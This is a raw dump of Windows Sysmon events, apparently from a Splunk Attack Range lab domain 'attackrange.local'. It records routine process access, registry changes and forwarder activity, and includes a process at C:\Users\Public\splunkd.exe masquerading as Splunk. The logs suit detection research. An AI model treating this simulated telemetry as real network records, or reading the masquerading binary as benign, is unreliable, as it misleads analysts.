M32\ntdll.dll+51781 10341000x80000000000000001052414Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.825{5EBD8912-7F2F-614D-0C00-00000000FC01}8286000C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1600-00000000FC01}1268C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052413Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.819{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1000-00000000FC01}380C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052412Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.819{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1000-00000000FC01}380C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052411Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.815{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\DFS ReplicationMD5=268FF120E13C99EF45D483F9ECC4DD2E,SHA256=7671A0DD734C654F1F49D5E18D001393633454219A6A316707F7306A5E774ED1,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001052410Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:07.806{5EBD8912-7F30-614D-1600-00000000FC01}1268C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Winmgmt\Parameters\ServiceDllUnloadOnStopDWORD (0x00000000) 13241300x80000000000000001052409Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:07.805{5EBD8912-7F30-614D-1100-00000000FC01}404C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient\SpecialPollTimeRemainingBinary Data 13241300x80000000000000001052408Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:07.805{5EBD8912-7F30-614D-1100-00000000FC01}404C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient\SpecialPollTimeRemainingBinary Data 13241300x80000000000000001052407Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:07.759{5EBD8912-7F11-614D-0100-00000000FC01}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Enum\NextInstanceDWORD (0x00000001) 13241300x80000000000000001052406Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:07.759{5EBD8912-7F11-614D-0100-00000000FC01}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Enum\CountDWORD (0x00000001) 12241200x80000000000000001052405Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-DeleteValue2021-09-27 09:19:07.759{5EBD8912-7F11-614D-0100-00000000FC01}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Enum\1 13241300x80000000000000001052404Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:07.759{5EBD8912-7F11-614D-0100-00000000FC01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\NextInstanceDWORD (0x00000000) 13241300x80000000000000001052403Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:07.759{5EBD8912-7F11-614D-0100-00000000FC01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\CountDWORD (0x00000000) 12241200x80000000000000001052402Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-DeleteValue2021-09-27 09:19:07.759{5EBD8912-7F11-614D-0100-00000000FC01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\0 23542300x80000000000000001052401Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.744{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8EFE01FB6EA32CEBD1B496253767A56,SHA256=566F693E5E20EDA094C3AD2847AC48E2A2FC5F278AE34163A2AABCFFD18A370F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052400Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.802{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53488-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000980302Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:07.030{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=277F55BC8F8BCA3E1B050DF5EAE6E917,SHA256=1EB9F1136E04F6263C040DFA658E87F38C986DA6B5362F96F1CB144F6688159C,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001052399Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:07.697{5EBD8912-7F11-614D-0100-00000000FC01}4SystemHKLM\System\CurrentControlSet\Services\mouclass\Enum\NextInstanceDWORD (0x00000001) 13241300x80000000000000001052398Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:07.697{5EBD8912-7F11-614D-0100-00000000FC01}4SystemHKLM\System\CurrentControlSet\Services\mouclass\Enum\CountDWORD (0x00000001) 12241200x80000000000000001052397Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-DeleteValue2021-09-27 09:19:07.697{5EBD8912-7F11-614D-0100-00000000FC01}4SystemHKLM\System\CurrentControlSet\Services\mouclass\Enum\1 13241300x80000000000000001052396Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:07.697{5EBD8912-7F11-614D-0100-00000000FC01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\NextInstanceDWORD (0x00000001) 13241300x80000000000000001052395Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:07.697{5EBD8912-7F11-614D-0100-00000000FC01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\CountDWORD (0x00000001) 12241200x80000000000000001052394Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-DeleteValue2021-09-27 09:19:07.697{5EBD8912-7F11-614D-0100-00000000FC01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\1 10341000x80000000000000001052393Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-8C89-6151-6E7A-00000000FC01}7036C:\Windows\system32\DllHost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052392Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7FBB-614D-8500-00000000FC01}3904C:\Windows\System32\msdtc.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052391Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F53-614D-7700-00000000FC01}2312C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052390Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052389Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F42-614D-4700-00000000FC01}3700C:\Windows\system32\conhost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052388Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F42-614D-4400-00000000FC01}3648C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052387Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F41-614D-3700-00000000FC01}3368C:\Windows\system32\conhost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052386Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-3300-00000000FC01}3180C:\Windows\System32\vds.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052385Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-3100-00000000FC01}2212C:\Windows\system32\wbem\unsecapp.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052384Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-3000-00000000FC01}1812C:\Windows\system32\dfssvc.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052383Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\system32\dns.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052382Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2E00-00000000FC01}2456C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052381Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052380Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2C00-00000000FC01}3028C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052379Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2B00-00000000FC01}3008C:\Windows\system32\DFSRs.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052378Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2A00-00000000FC01}3000C:\Windows\System32\ismserv.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052377Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052376Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2700-00000000FC01}2888C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052375Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2500-00000000FC01}2788C:\Windows\System32\spoolsv.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052374Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F39-614D-2300-00000000FC01}2624C:\Windows\System32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052373Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F37-614D-2200-00000000FC01}2548C:\Windows\system32\conhost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052372Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F37-614D-2100-00000000FC01}2540C:\Users\Public\splunkd.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052371Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F31-614D-1F00-00000000FC01}2096C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052370Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1700-00000000FC01}1448C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052369Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 